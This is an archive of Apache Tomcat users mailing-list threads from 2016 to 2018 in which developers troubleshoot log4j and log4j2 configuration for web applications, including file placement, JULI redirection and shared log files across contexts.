Are you using embedded Tomcat or Spring Boot or anything like that?
Where is your JAR file located?

- -chris

> -Original Message- From: Ryan Palmer Sent: Tuesday,
> December 18, 2018 7:49 PM
> 
> Michael,
> 
> Tomcat uses JULI internally. Have you taken necessary steps to
> redirect JULI to log4j?
> 
> Thanks, Ryan
> 
>  From: Lemke, Michael ST/HZA-ZIC2
>  Sent: Tuesday, December 18, 2018 10:20
> AM To: Tomcat Users List Subject: RE: log4j app logging
> 
> On December 18, 2018 6:59 PM Ryan Palmer wrote:
>> 
>> The file needs to be named
>> log4j.properties<http://log4j.properties> (or .xml, .json, etc.)
>> and needs to be in the classpath. You ommitted the 'j'.
> 
> Thanks for spotting this. Unfortunately, this typo was only in the
> email:
> 
> pc# ls src/main/resources/ com  log4j.properties
> 
> 
> So for being in the classpath it is sufficient to have it packaged
> in the jar, isn't it?
> 
> Archive:  myapp-1.1.0-SNAPSHOT.jar Length   MethodSize  Cmpr
> DateTime   CRC-32   Name   --  --- 
> -- -    0  Stored0   0% 12-18-2018
> 16:56   META-INF/ 98  Defl:N   91   7% 12-18-2018 16:56
> 48730e36  META-INF/MANIFEST.MF 0  Stored0   0% 12-18-2018
> 16:56   META-INF/maven/ ... 0  Stored0   0%
> 12-18-2018 16:56   com/ ... 1123  Defl:N  451  60%
> 12-18-2018 16:56 eea5d81a  log4j.properties
> 
> It ought to be something simple but before further digging into my
> setup details I want to make sure there isn't something special for
> tomcat. Something in ${catalina.base}/conf or conflicts with
> tomcat's logging system.
> 
> 
>> On Dec 18, 2018, at 9:42 AM, "Lemke, Michael ST/HZA-ZIC2" wrote:
>> 
>> I have an old webapp that uses log4j 1.2 and which I am trying to
>> deploy on tomcat. For the heck of it I can't get tomcat to use
>> the log4.properties<http://log4.properties> file. What am I doing
>> wrong?
>> 
>> tomcat 9.0.6 is installed as a Windows service and does serve my
>> webapp, so the app is working fine. The project is mavenized, I
>> put log4.properties<http://log4.properties> to src/main/resources
>> and it ends up in the jar file of my application. Is there
>> anything special that needs to be done?
>> 
>> 
>> 
>> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org For
>> additional commands, e-mail: users-h...@tomcat.apache.org
>> 
> 
> -

Re: log4j app logging

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Michael,

On 12/18/18 12:42, Lemke, Michael  ST/HZA-ZIC2 wrote:
> I have an old webapp that uses log4j 1.2 and which I am trying to 
> deploy on tomcat. For the heck of it I can't get tomcat to use the 
> log4.properties file. What am I doing wrong?

Are you trying to get Tomcat to use the log4j.properties file from
your application? If so, that's not going to work, because Tomcagt
starts up long before your application is loaded, and so the log4j.jar
file and log4j.properties file are not used at all.

Your *application* should be able to use log4j without any problems as
long as the log4j.jar file is in WEB-INB/lib and your log4j.properties
file is in (usually) WEB-INF/classes/log4j.properties.

> tomcat 9.0.6 is installed as a Windows service and does serve my 
> webapp, so the app is working fine. The project is mavenized, I
> put log4.properties to src/main/resources and it ends up in the jar
> file of my application. Is there anything special that needs to be
> done?

How are you initializing log4j?

- -chris
-BEGIN PGP SIGNATURE-
Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/

iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAlwZT8kACgkQHPApP6U8
pFjhkxAAi2N30jbKuENmuYhCVq6mlN2N0r8BQcNBhS6fx36DqLQd8V4/BRMQ3Y7+
o/mD1iG+2oGyovocdjspYgFD98dPoL4crUkhrWdc+FUJU7+M64zs7pwfvEnEpdQo
XXp4H15XYOfUT3IyqWuuxoOuX7AHwKfGvUoKSapiGxCWWGsW8LUVcWpec+Ow+oKu
7jd6Tc7xPMqvWpMHKJ/MoamU0BaxpE774BJSz7QJKu7tb/flSykc08vUVxGPg/9X
tfqbiQ8RbzP8Y7UFdDmbySPhK/+VpbwU7ljx5/detNshxZZrEwjKSU3udS/A9bxi
pHkM3gPbtyN/L9VLwaAF1LlxqYolkOqJRuGrw9hRtU5ihydyd7C3Du7T6CpWLSRn
WQ2UTEVwSMJl2y+FF+nKs2o/svPaNNyiwdRq6A1VuEfZBTgb4pG2XDkggOtgqYX0
KuzYwtvKvPU/VWJsRYZkEtQ4yCiHUKiKoGz4AiZSHqxLQ4oSAetMx1SUtCTRllb9
bOHaMJkiTh+Iez1t1JRSQtYloW+z2i9w4H/CDwU6YDWOkmvp5URbEtIxUzpAcl3f
E4o9FHcYZKG8KUYobkeSNDD5mo19QDbRUbnLx0TzvtYCbzrg+Ol60yd+8A9lzAz7
6Rz6EePOYXCPjQD3i8OCpbTt1UCGQJB0M6nXr9qNBO5uoBQYMXw=
=uBKg
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: log4j app logging

[Lemke, Michael ST/HZA-ZIC2]

Thanks, Ryan, this JULI thing actually is what worries me. I don't care about 
tomcat's logging at the moment. It is my webapp's logging I can't figure out. 
It worked on other containers.

-Original Message-
From: Ryan Palmer
Sent: Tuesday, December 18, 2018 7:49 PM

Michael,

Tomcat uses JULI internally. Have you taken necessary steps to redirect JULI to 
log4j?

Thanks,
Ryan


From: Lemke, Michael ST/HZA-ZIC2 
Sent: Tuesday, December 18, 2018 10:20 AM
To: Tomcat Users List
Subject: RE: log4j app logging

On December 18, 2018 6:59 PM
Ryan Palmer wrote:
>
>The file needs to be named log4j.properties<http://log4j.properties> (or .xml, 
>.json, etc.) and needs to be in the classpath. You ommitted the 'j'.

Thanks for spotting this. Unfortunately, this typo was only in the email:

pc# ls src/main/resources/
com  log4j.properties


So for being in the classpath it is sufficient to have it packaged in the jar, 
isn't it?

Archive:  myapp-1.1.0-SNAPSHOT.jar
 Length   MethodSize  CmprDateTime   CRC-32   Name
  --  ---  -- -   
   0  Stored0   0% 12-18-2018 16:56   META-INF/
  98  Defl:N   91   7% 12-18-2018 16:56 48730e36  META-INF/MANIFEST.MF
   0  Stored0   0% 12-18-2018 16:56   META-INF/maven/
...
   0  Stored0   0% 12-18-2018 16:56   com/
...
1123  Defl:N  451  60% 12-18-2018 16:56 eea5d81a  log4j.properties

It ought to be something simple but before further digging into my setup 
details I want to make sure there isn't something special for tomcat. Something 
in ${catalina.base}/conf or conflicts with tomcat's logging system.


>On Dec 18, 2018, at 9:42 AM, "Lemke, Michael ST/HZA-ZIC2" wrote:
>
>I have an old webapp that uses log4j 1.2 and which I am trying to deploy on 
>tomcat. For the heck of it I can't get tomcat to use the 
>log4.properties<http://log4.properties> file. What am I doing wrong?
>
>tomcat 9.0.6 is installed as a Windows service and does serve my webapp, so 
>the app is working fine. The project is mavenized, I put 
>log4.properties<http://log4.properties> to src/main/resources and it ends up 
>in the jar file of my application. Is there anything special that needs to be 
>done?
>
>
>
>To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
>For additional commands, e-mail: users-h...@tomcat.apache.org
>

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: log4j app logging

[Ryan Palmer]

Michael,

Tomcat uses JULI internally. Have you taken necessary steps to redirect JULI to 
log4j?

Thanks,
Ryan


From: Lemke, Michael ST/HZA-ZIC2 
Sent: Tuesday, December 18, 2018 10:20 AM
To: Tomcat Users List
Subject: RE: log4j app logging

On December 18, 2018 6:59 PM
Ryan Palmer wrote:
>
>The file needs to be named log4j.properties<http://log4j.properties> (or .xml, 
>.json, etc.) and needs to be in the classpath. You ommitted the 'j'.

Thanks for spotting this. Unfortunately, this typo was only in the email:

pc# ls src/main/resources/
com  log4j.properties


So for being in the classpath it is sufficient to have it packaged in the jar, 
isn't it?

Archive:  myapp-1.1.0-SNAPSHOT.jar
 Length   MethodSize  CmprDateTime   CRC-32   Name
  --  ---  -- -   
   0  Stored0   0% 12-18-2018 16:56   META-INF/
  98  Defl:N   91   7% 12-18-2018 16:56 48730e36  META-INF/MANIFEST.MF
   0  Stored0   0% 12-18-2018 16:56   META-INF/maven/
...
   0  Stored0   0% 12-18-2018 16:56   com/
...
1123  Defl:N  451  60% 12-18-2018 16:56 eea5d81a  log4j.properties

It ought to be something simple but before further digging into my setup 
details I want to make sure there isn't something special for tomcat. Something 
in ${catalina.base}/conf or conflicts with tomcat's logging system.


>On Dec 18, 2018, at 9:42 AM, "Lemke, Michael ST/HZA-ZIC2" wrote:
>
>I have an old webapp that uses log4j 1.2 and which I am trying to deploy on 
>tomcat. For the heck of it I can't get tomcat to use the 
>log4.properties<http://log4.properties> file. What am I doing wrong?
>
>tomcat 9.0.6 is installed as a Windows service and does serve my webapp, so 
>the app is working fine. The project is mavenized, I put 
>log4.properties<http://log4.properties> to src/main/resources and it ends up 
>in the jar file of my application. Is there anything special that needs to be 
>done?
>
>
>
>To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
>For additional commands, e-mail: users-h...@tomcat.apache.org
>

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: log4j app logging

[Lemke, Michael ST/HZA-ZIC2]

On December 18, 2018 6:59 PM
Ryan Palmer wrote:
>
>The file needs to be named log4j.properties<http://log4j.properties> (or .xml, 
>.json, etc.) and needs to be in the classpath. You ommitted the 'j'.

Thanks for spotting this. Unfortunately, this typo was only in the email:

pc# ls src/main/resources/
com  log4j.properties


So for being in the classpath it is sufficient to have it packaged in the jar, 
isn't it?

Archive:  myapp-1.1.0-SNAPSHOT.jar
 Length   MethodSize  CmprDateTime   CRC-32   Name
  --  ---  -- -   
   0  Stored0   0% 12-18-2018 16:56   META-INF/
  98  Defl:N   91   7% 12-18-2018 16:56 48730e36  META-INF/MANIFEST.MF
   0  Stored0   0% 12-18-2018 16:56   META-INF/maven/
...
   0  Stored0   0% 12-18-2018 16:56   com/
...
1123  Defl:N  451  60% 12-18-2018 16:56 eea5d81a  log4j.properties

It ought to be something simple but before further digging into my setup 
details I want to make sure there isn't something special for tomcat. Something 
in ${catalina.base}/conf or conflicts with tomcat's logging system.


>On Dec 18, 2018, at 9:42 AM, "Lemke, Michael ST/HZA-ZIC2" wrote:
>
>I have an old webapp that uses log4j 1.2 and which I am trying to deploy on 
>tomcat. For the heck of it I can't get tomcat to use the 
>log4.properties<http://log4.properties> file. What am I doing wrong?
>
>tomcat 9.0.6 is installed as a Windows service and does serve my webapp, so 
>the app is working fine. The project is mavenized, I put 
>log4.properties<http://log4.properties> to src/main/resources and it ends up 
>in the jar file of my application. Is there anything special that needs to be 
>done?
>
>
>
>To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
>For additional commands, e-mail: users-h...@tomcat.apache.org
>

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: log4j app logging

[Ryan Palmer]

Michael,

The file needs to be named log4j.properties<http://log4j.properties> (or .xml, 
.json, etc.) and needs to be in the classpath. You ommitted the 'j'.

Sent from BlueMail<http://www.bluemail.me/r?b=14063>
On Dec 18, 2018, at 9:42 AM, "Lemke, Michael ST/HZA-ZIC2" 
mailto:lemke...@schaeffler.com>> wrote:

I have an old webapp that uses log4j 1.2 and which I am trying to deploy on 
tomcat. For the heck of it I can't get tomcat to use the 
log4.properties<http://log4.properties> file. What am I doing wrong?

tomcat 9.0.6 is installed as a Windows service and does serve my webapp, so the 
app is working fine. The project is mavenized, I put 
log4.properties<http://log4.properties> to src/main/resources and it ends up in 
the jar file of my application. Is there anything special that needs to be done?



To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

log4j app logging

[Lemke, Michael ST/HZA-ZIC2]

I have an old webapp that uses log4j 1.2 and which I am trying to deploy on 
tomcat. For the heck of it I can't get tomcat to use the log4.properties file. 
What am I doing wrong?

tomcat 9.0.6 is installed as a Windows service and does serve my webapp, so the 
app is working fine. The project is mavenized, I put log4.properties to 
src/main/resources and it ends up in the jar file of my application. Is there 
anything special that needs to be done?

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Re: log4j: Logging to same file from multiple contexts?

[Christopher Schultz]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

David,

On 10/8/18 14:27, David Filip wrote:
> Dear Tomcat Users,
> 
> Apologies if this is more of a log4j question, but I thought that
> I'd start here, in case Tomcat has any easy remedies.
> 
> I have a common webapp that I deploy to multiple, different
> contexts.
> 
> In log4j.properties, I have a few different log files defined,
> e.g., for logins:
> 
> log4j.appender.logins=org.apache.log4j.DailyRollingFileAppender 
> log4j.appender.logins.file=${catalina.home}/logs/logins.log 
> log4j.appender.logins.datePattern='.'-MM-dd 
> log4j.appender.logins.append=true 
> log4j.appender.logins.layout=org.apache.log4j.PatternLayout 
> log4j.appender.logins.layout.ConversionPattern=[%d{MM/dd/
> HH:mm:ss}] [%p] [%C{1}]: %m%n
> 
> log4j.logger.com.colornet.CAP.Actions.LoginAction=info, logins 
> log4j.logger.com.colornet.CAP.Util.LoginTokenTag=info, logins
> 
> However, as you may have guessed, if I have the same log4j
> configuration file for each context, the contexts tend to
> over-write each other.
> 
> Is there any way to have the SAME log4j.properties deployed too
> multiple contexts play nicely and not overwrite each other, but
> merely append each other?
> 
> Extra credit question (although sounds even more like a log4j
> question, so apologies): If not, is there any way to define the
> file path, e.g.:
> 
> log4j.appender.logins.file=${catalina.home}/logs/logins.log
> 
> to include the specific context?  I have found a few references on
> the 'Net, e.g., ${contextPath}, ${servletName}, etc., which don't
> seem to work.
> 
> My goal (desire?) is to have the same webapp and configuration and
> web.xml and log4j.properties, etc., deployed to every web context,
> but not have one context overwrite another content's entries.
> 
> Of course, as the Mick once said, "You can't always have what you
> want".
> 
> Please let me know if this is possible.

I'm not sure it's really a great idea to have all these separate
context logging to the same log file(s), but here is a way to do this:

1. Move (*move!*) your log4j.jar file from WEB-INF/lib to Tomcat's
lib/ directory

2. Move (*move!) your log4j.properties file from WEB-INF/classes to
Tomcat's lib/ directory. You may have to wrap it in a JAR file.

This ought to allow log4j to initialize a single time, and each
application will use that singly-initialized log4j instance.

- -chris
-BEGIN PGP SIGNATURE-
Comment: Using GnuPG with Thunderbird - https://www.enigmail.net/

iQIzBAEBCAAdFiEEMmKgYcQvxMe7tcJcHPApP6U8pFgFAlu+EwQACgkQHPApP6U8
pFjKIA//UL0KHt11kczm28Yv9Ab9WbdHXxnG3dqC25q+HTA1Eq5wu/pTfCGPoa03
R4Sc5r3HpapyeMtZR1XFCPVFPAgbiHQeCD7Bkduw0bCKV8ZOvRJJOgqiXHYiW0cF
RuThsq/txShzRZ1KLqGOuZvfA6MsjIEXdWNdnbSH5g5lDT1mRsabzEpdqbkWXc8W
wru1VWZBNHQwU1k1wZ7ts1jVKZQzJhcO1scs/RWXIHNs8R+dADNsWcsqWzYyeuAm
nWYfhsN03/ilQwBjpAqDBsSnt7a3TvLW4Zh9XrcJylHenOdewj53MdL4AnjS7zUS
+TL3xHB+y8GEIUEsxuuAZy0sKVoPfApEHVovp6cTXzSUi+4fn+gBG2E0zL2o87GD
dfoBsgN3gpMw3oGqB2C67El/ECLIVdo6gU/kw1Pq/asMJPwFMK9OPWk06ScXec7n
ff52KuNt9Oedsm12J7d/GkfMb/8KtvTvzRI30FVf5phCvdkZrOPA0Nsuy40z+jcI
vOwIVcqONUDuG1rkD6Qnm5KwoBDJfkkNTy7BxJS5qtQmCV3dUDm3vvcm5cNzFXlK
b5yvp7UvAPyg13AdjGQd6C0rtG8p+RtTmwJvEZU4bQ16ZYWyQUDhVdLAnvgjb9Iv
jJxF2gAvcLxoqMnEh2AdWCSJjfrQkrZi/4vAYaFYK60EMnElh4w=
=5bwl
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

RE: log4j: Logging to same file from multiple contexts?

[Jäkel , Guido]

Dear Dave,

I walk through that years before, too.

Yes - you can't let write different Log4J Appenders to the same file or you get 
this garbage.

Yes - you have property resolving here, but there are no properties you need.


We did a solution using an additional servlet called at application init that 
temporary define a property from the application parameters like virtual host 
and context path, write out the first logging entry to let initialize Log4J 
here, i.e. read the configuration file with the current parameter and finally 
undefine the parameter (for savety). This sequence has to by synchronized by an 
JVM-wide singleton to prevent parallel execution in case you have more than one 
application using this. Write me an email if I should search for the source 
code.


Another solution is to use a SocketAppender and an "central" receiver anywhere 
(running with a standalone JVM)


  <-- 
this name is NOT related to log4j, you may choose any you want.













[...]



  <-- local file logging



The AsyncAppender is chained on top to have a fuse not to block logging (and 
the application) in case of trouble with the receiver.


Greetings

Guido

>-Original Message-
>From: David Filip [mailto:dfi...@colornet.com]
>Sent: Monday, October 08, 2018 8:28 PM
>To: users@tomcat.apache.org
>Subject: log4j: Logging to same file from multiple contexts?
>
>Dear Tomcat Users,
>
>Apologies if this is more of a log4j question, but I thought that I'd start 
>here, in case Tomcat has any easy remedies.
>
>I have a common webapp that I deploy to multiple, different contexts.
>
>In log4j.properties, I have a few different log files defined, e.g., for 
>logins:
>
>log4j.appender.logins=org.apache.log4j.DailyRollingFileAppender
>log4j.appender.logins.file=${catalina.home}/logs/logins.log
>log4j.appender.logins.datePattern='.'-MM-dd
>log4j.appender.logins.append=true
>log4j.appender.logins.layout=org.apache.log4j.PatternLayout
>log4j.appender.logins.layout.ConversionPattern=[%d{MM/dd/ HH:mm:ss}] [%p] 
>[%C{1}]: %m%n
>
>log4j.logger.com.colornet.CAP.Actions.LoginAction=info, logins
>log4j.logger.com.colornet.CAP.Util.LoginTokenTag=info, logins
>
>However, as you may have guessed, if I have the same log4j configuration file 
>for each context, the contexts tend to over-write
>each other.
>
>Is there any way to have the SAME log4j.properties deployed too multiple 
>contexts play nicely and not overwrite each other, but
>merely append each other?
>
>Extra credit question (although sounds even more like a log4j question, so 
>apologies): If not, is there any way to define the
>file path, e.g.:
>
>log4j.appender.logins.file=${catalina.home}/logs/logins.log
>
>to include the specific context?  I have found a few references on the 'Net, 
>e.g., ${contextPath}, ${servletName}, etc., which
>don't seem to work.
>
>My goal (desire?) is to have the same webapp and configuration and web.xml and 
>log4j.properties, etc., deployed to every web
>context, but not have one context overwrite another content's entries.
>
>Of course, as the Mick once said, "You can't always have what you want".
>
>Please let me know if this is possible.
>
>Thanks,
>
>Dave.
>
>
>


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

log4j: Logging to same file from multiple contexts?

[David Filip]

Dear Tomcat Users,

Apologies if this is more of a log4j question, but I thought that I'd start 
here, in case Tomcat has any easy remedies.

I have a common webapp that I deploy to multiple, different contexts.

In log4j.properties, I have a few different log files defined, e.g., for logins:

log4j.appender.logins=org.apache.log4j.DailyRollingFileAppender
log4j.appender.logins.file=${catalina.home}/logs/logins.log
log4j.appender.logins.datePattern='.'-MM-dd
log4j.appender.logins.append=true
log4j.appender.logins.layout=org.apache.log4j.PatternLayout
log4j.appender.logins.layout.ConversionPattern=[%d{MM/dd/ HH:mm:ss}] [%p] 
[%C{1}]: %m%n

log4j.logger.com.colornet.CAP.Actions.LoginAction=info, logins
log4j.logger.com.colornet.CAP.Util.LoginTokenTag=info, logins

However, as you may have guessed, if I have the same log4j configuration file 
for each context, the contexts tend to over-write each other.

Is there any way to have the SAME log4j.properties deployed too multiple 
contexts play nicely and not overwrite each other, but merely append each other?

Extra credit question (although sounds even more like a log4j question, so 
apologies): If not, is there any way to define the file path, e.g.:

log4j.appender.logins.file=${catalina.home}/logs/logins.log

to include the specific context?  I have found a few references on the 'Net, 
e.g., ${contextPath}, ${servletName}, etc., which don't seem to work.

My goal (desire?) is to have the same webapp and configuration and web.xml and 
log4j.properties, etc., deployed to every web context, but not have one context 
overwrite another content's entries.

Of course, as the Mick once said, "You can't always have what you want".

Please let me know if this is possible.

Thanks,

Dave.

Re: log4j

[Luis Rodríguez Fernández]

Hello Chris,

You can have a look here:
https://logging.apache.org/log4j/2.x/log4j-appserver/index.html

Hope it helps,

Luis

2018-05-18 19:55 GMT+02:00 George Stanchev <gstanc...@serena.com>:

> Depends on what you're asking. If you're asking to use log4j to capture
> Tomcat logging, then the answer is - you can't but you can use Log4j2 or
> JULI. If the question is how to use log4j for your apps deployed under
> Tomcat, then answer can be found easily...
>
> From: Cheltenham, Chris <ccheltenham-...@philasd.org>
> Sent: Friday, May 18, 2018 7:50 AM
> To: 'Tomcat Users List' <users@tomcat.apache.org>
> Subject: log4j
>
> Hello,
>
> How do I configure Tomcat 8.5.x to use log4j?
>
> Is there a good document to follow?
>
> I am not very familiar with java but it looks like you configure to logs
> to accept java logging for Tomcat.
>
>
> ===
>
> Thank You;
>
> Chris Cheltenham
> Technology Services
> The School District of Philadelphia
>
> Work # 215-400-5025
> Cell # 215-301-6571
>



-- 

"Ever tried. Ever failed. No matter. Try Again. Fail again. Fail better."

- Samuel Beckett

RE: log4j

[George Stanchev]

Depends on what you're asking. If you're asking to use log4j to capture Tomcat 
logging, then the answer is - you can't but you can use Log4j2 or JULI. If the 
question is how to use log4j for your apps deployed under Tomcat, then answer 
can be found easily...

From: Cheltenham, Chris <ccheltenham-...@philasd.org>
Sent: Friday, May 18, 2018 7:50 AM
To: 'Tomcat Users List' <users@tomcat.apache.org>
Subject: log4j

Hello,

How do I configure Tomcat 8.5.x to use log4j?

Is there a good document to follow?

I am not very familiar with java but it looks like you configure to logs to 
accept java logging for Tomcat.


===

Thank You;

Chris Cheltenham
Technology Services
The School District of Philadelphia

Work # 215-400-5025
Cell # 215-301-6571

Re: log4j

[José Cornado]

Also, it may make more sense to code log4j into your app. If you change
servers the logging goes with it.

Best,

J

On Fri, May 18, 2018 at 8:06 AM M. Manna <manme...@gmail.com> wrote:

> Hi Chris,
>
> How r u planning to use Log4j (or log4j2, which solves a lot of performance
> issues for 1.2.x)?
>
> Are you bridging with SLF4J or or using directly?
>
> All log4j configuration are automatically discovered and configured
> provided that you have set up your appplication log4j properties file
> correctly.
>
> Tomcat doesn't do anything specific to log4j-related setup. There is a
> logging properties file in /conf/ which are for JULI logging, as a bare
> minimum OOB setup for catalina.
>
> If you can perhaps clarify your use case, others can advise better.
>
> regards,
>
> On 18 May 2018 at 14:49, Cheltenham, Chris <ccheltenham-...@philasd.org>
> wrote:
>
> > Hello,
> >
> >
> >
> > How do I configure Tomcat 8.5.x to use log4j?
> >
> >
> >
> > Is there a good document to follow?
> >
> >
> >
> > I am not very familiar with java but it looks like you configure to logs
> > to accept java logging for Tomcat.
> >
> >
> >
> >
> >
> > ===
> >
> > Thank You;
> >
> > Chris Cheltenham
> > Technology Services
> > The School District of Philadelphia
> >
> > Work # 215-400-5025
> > Cell # 215-301-6571
> >
>

Re: log4j

[M. Manna]

Hi Chris,

How r u planning to use Log4j (or log4j2, which solves a lot of performance
issues for 1.2.x)?

Are you bridging with SLF4J or or using directly?

All log4j configuration are automatically discovered and configured
provided that you have set up your appplication log4j properties file
correctly.

Tomcat doesn't do anything specific to log4j-related setup. There is a
logging properties file in /conf/ which are for JULI logging, as a bare
minimum OOB setup for catalina.

If you can perhaps clarify your use case, others can advise better.

regards,

On 18 May 2018 at 14:49, Cheltenham, Chris <ccheltenham-...@philasd.org>
wrote:

> Hello,
>
>
>
> How do I configure Tomcat 8.5.x to use log4j?
>
>
>
> Is there a good document to follow?
>
>
>
> I am not very familiar with java but it looks like you configure to logs
> to accept java logging for Tomcat.
>
>
>
>
>
> ===
>
> Thank You;
>
> Chris Cheltenham
> Technology Services
> The School District of Philadelphia
>
> Work # 215-400-5025
> Cell # 215-301-6571
>

log4j

[Cheltenham, Chris]

Hello,

 

How do I configure Tomcat 8.5.x to use log4j?

 

Is there a good document to follow?

 

I am not very familiar with java but it looks like you configure to logs
to accept java logging for Tomcat.

 

 

===

Thank You;

Chris Cheltenham
Technology Services
The School District of Philadelphia

Work # 215-400-5025
Cell # 215-301-6571 

Re: log4j in Tomcat 8.5

[Mark Thomas]

On 02/02/17 21:53, George Stanchev wrote:

Hi,

I am transitioning from Tomcat 7.0 to Tomcat 8.5 and I was wondering what do I 
need to do to use log4j in 8.5. Reading this bug [1], it states that the 
support for the for log4j has been dropped since it is EOLed. Now, there is a 
comment on this issue from Mark that says that it is applied against version 9, 
but this bug was referenced from the changelog for 8.5 [2] that states:


Correct a regression in the fix for 58588 that removed the entire 
org.apache.juli package from the embedded JARs rendering them unusable. (markt)


which implies it has been applied to 8.5. So my question is, can I make Tomcat 
8.5 use log4j?


log4j - no

log4j2 - yes

You'll need to use the standard log4j2 mechanism to capture 
java.util.logging output and redirect it.


Mark

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

log4j in Tomcat 8.5

[George Stanchev]

Hi,

I am transitioning from Tomcat 7.0 to Tomcat 8.5 and I was wondering what do I 
need to do to use log4j in 8.5. Reading this bug [1], it states that the 
support for the for log4j has been dropped since it is EOLed. Now, there is a 
comment on this issue from Mark that says that it is applied against version 9, 
but this bug was referenced from the changelog for 8.5 [2] that states:


Correct a regression in the fix for 58588 that removed the entire 
org.apache.juli package from the embedded JARs rendering them unusable. (markt)


which implies it has been applied to 8.5. So my question is, can I make Tomcat 
8.5 use log4j?

George




[1] https://bz.apache.org/bugzilla/show_bug.cgi?id=58588
[2] http://tomcat.apache.org/tomcat-8.5-doc/changelog.html

Re: Log4j Issue

[Mark Eggers]

Syed,

Please do not top post. See:

http://tomcat.apache.org/lists.html#tomcat-users

item 6.


My responses are inline.

On 8/10/2016 1:43 AM, Syed Mudassir Ahmed wrote:
> Mark,
>   Thanks for the response.
>   Indeed I am using Log4j-2.  Below is my xml file:
> 
> 
> 
>   
>  
>  filePattern="/home/syed/logs/ssp-log-%d{MM-dd-}-%i.txt">
>   
> date:%d, millisecs:%r, level:%p, logger:%c, thread:[%t],
> file:%F, method:%M, line:%L, message:%m%n%n
>   
>   
> 
>   
>   
> 
>   
>   
> 
>
> 
> 
>   
> 
>   
> 

You really need to read the log4j2 documentation. In particular, pay
attention to the logger documentation.

> 
> And in my web app, I have the following statement that will set the system
> property to where the above file is located at:
> 
> System.setProperty("log4j.configurationFile", "file://" + rootPath +
> "/log4j-2.xml");

You really need to read the link I gave you on how log4j2 is configured
with web applications.

Again, the link is:

https://logging.apache.org/log4j/2.x/manual/webapp.html

Follow it slavishly until you get things working.

You really need to follow the documentation on where to place log4j2.xml
and how that file is found.

http://logging.apache.org/log4j/2.x/manual/configuration.html

In particular, pay attention to Automatic Configuration, item 9. I
recommend this until you do a little more reading / research, and
understand how things work.

That's why I recommended to place log4j2.xml in WEB-INF/classes or in a
JAR file in WEB-INF/lib. It's then on the web application classpath. No
other configuration is necessary.

In particular, pay attention to what happens when you do not configure
log4j2 correctly, notably Automatic Configuration, item 10.

10. If no configuration file could be located the DefaultConfiguration
will be used. This will cause logging output to go to the console.

This will dump your log output to the console, which ends up in
catalina.out when running in Tomcat.

> 
> 
> Thanks,
> 
> 
> On Wed, Aug 10, 2016 at 11:59 AM, Mark Eggers <its_toas...@yahoo.com.invalid
>> wrote:
> 
>> Syed,
>>
>> On 8/9/2016 10:08 PM, Syed Mudassir Ahmed wrote:
>>> I am using Log4j in my web app to write the logs to a separate file.
>>> Surprisingly, that log file is not at all getting created.  I run
>>> the logger logic as a standalone application and the log file indeed
>>> gets created.  I am assuming tomcat is not allowing me to write my
>>> logs to a file.  It is simply redirecting all the log messages to
>>> catalina.out.  Any suggestions on how to direct my logs to a separate
>>> file and not to catalina.out.
>>>
>>> Thanks,
>>>
>>
>> Hmm,
>>
>> Works for me . . .
>>
>> 
>> >   'PUBLIC:-//log4j/log4j Configuration//EN'
>>   'http://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/xml/doc-
>>   files/log4j.dtd'>
>> 
>>   
>> 
>> 
>>   
>> 
>>   
>>   
>> 
>> 
>>   
>> 
>>
>> (sorry for the word wrap for the !DOCTYPE line).
>>
>> Since log4j 1.x was retired in April of 2015, maybe you should move to
>> log4j2.
>>
>> Read the following:
>>
>> https://logging.apache.org/log4j/2.x/manual/webapp.html
>>
>> A (more or less) corresponding log4j2.xml file (different app):
>>
>> 
>> 
>> 
>> > immediateFlush="true"
>> fileName="${sys:catalina.base}/logs/logstwo.log"
>> filePattern=
>>  "${sys:catalina.base}/logs/logstwo-%d{-MM-dd}.log.gz">
>> 
>> %d %-5p %c.%M:%L - %m%n
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>>
>> Note, the log4j2.xml does log rotation, as well as compression of the
>> rotated log files. It also logs at a package level one higher than the
>> log4j.xml configuration.
>>
>> The XML file (log4j.xml or log4j2.xml) goes into WEB-INF/classes, or in
>> a JAR file in WEB-INF/lib.
>>
>> The appropriate log4j jar files (different between log4j and log4j2) go
>> in WEB-INF/lib.
>>
>> Quite frankly, your question is very broad and without writing a
>> tutorial it's difficult to answer.
>>
>> I suggest reading the following as well:
>>
>> http://www.catb.org/~esr/faqs/smart-questions.html
>>

. . . just my two cents
/mde/






signature.asc
Description: OpenPGP digital signature

Re: Log4j Issue

[Syed Mudassir Ahmed]

Mark,
  Thanks for the response.
  Indeed I am using Log4j-2.  Below is my xml file:



  

  
date:%d, millisecs:%r, level:%p, logger:%c, thread:[%t],
file:%F, method:%M, line:%L, message:%m%n%n
  
  

  
  

  
  

   


  

  


And in my web app, I have the following statement that will set the system
property to where the above file is located at:

System.setProperty("log4j.configurationFile", "file://" + rootPath +
